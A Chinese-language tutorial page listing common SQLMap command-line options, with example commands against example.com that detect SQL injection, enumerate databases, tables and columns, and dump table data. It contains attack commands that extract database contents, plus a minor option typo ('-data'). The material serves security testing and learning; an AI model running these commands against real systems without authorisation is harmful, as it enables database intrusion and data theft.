赞
踩
SQLMap是一个自动化的SQL注入和数据库接管工具,它可以帮助安全研究人员和开发人员检测和利用SQL注入漏洞。以下是SQLMap的一些常用命令及其描述:
显示帮助信息:
-h
, --help
:显示帮助消息并退出。设置目标:
-u URL
, --url=URL
:指定目标URL。-d DIRECT
:直接连接到数据库。-l LIST
:从Burp或WebScarab代理的日志中解析目标。-r REQUESTFILE
:从一个文件中载入HTTP请求。HTTP请求选项:
--data=DATA
:通过POST发送的数据字符串。--cookie=COOKIE
:HTTP Cookie头。--user-agent=AGENT
:指定HTTP User-Agent头。--proxy=PROXY
:使用HTTP代理连接到目标URL。注入测试:
--tables
:枚举数据库的表。--columns
:枚举表的列(注意:此命令未在搜索结果中直接列出,但通常是SQLMap的常用功能)。--dump
:导出表中的数据。--dbms=DBMS
:指定目标数据库系统(注意:此命令未在搜索结果中直接列出,但可以通过其他选项隐式指定)。其他选项:
--level
:设置测试等级,默认值为1,最大值为5。--risk
:设置测试的风险等级,默认值为1,最大值为3。-v VERBOSE
:设置详细级别,范围为0-6。--batch
:自动选择第一个有效的选项,无需用户交互。针对特定情况的命令:
案例:
以下是一些SQLMap的示例命令:
检测注入点:
sqlmap -u "http://example.com/page.php?id=1"
这个命令将尝试检测给定的URL是否存在SQL注入漏洞。
列出所有数据库名称:
sqlmap -u "http://example.com/page.php?id=1" --dbs
如果检测到注入点,这个命令将列出目标服务器上的所有数据库名称。
列出当前数据库名称:
sqlmap -u "http://example.com/page.php?id=1" --current-db
这个命令将尝试确定当前正在使用的数据库名称。
列出指定数据库的所有表名:
sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" --tables
将“目标数据库名”替换为实际的数据库名称,此命令将列出该数据库中的所有表名。
列出指定表的所有字段名:
sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" -T "目标表名" --columns
将“目标数据库名”和“目标表名”替换为实际的数据库和表名称,此命令将列出该表中的所有字段名。
导出指定表的数据:
sqlmap -u "http://example.com/page.php?id=1" -D "目标数据库名" -T "目标表名" --dump
这个命令将导出指定表中的所有数据。
使用POST请求:
如果你的注入点在POST请求中,你可以使用-data
参数指定POST数据,例如:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234" --cookie="session_id=abc123"
这个命令将尝试在POST请求中检测SQL注入点,并使用给定的cookie值。
设置详细级别:
sqlmap -u "http://example.com/page.php?id=1" -v 3
这个命令将设置详细级别为3,以便你获取更多的输出信息。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。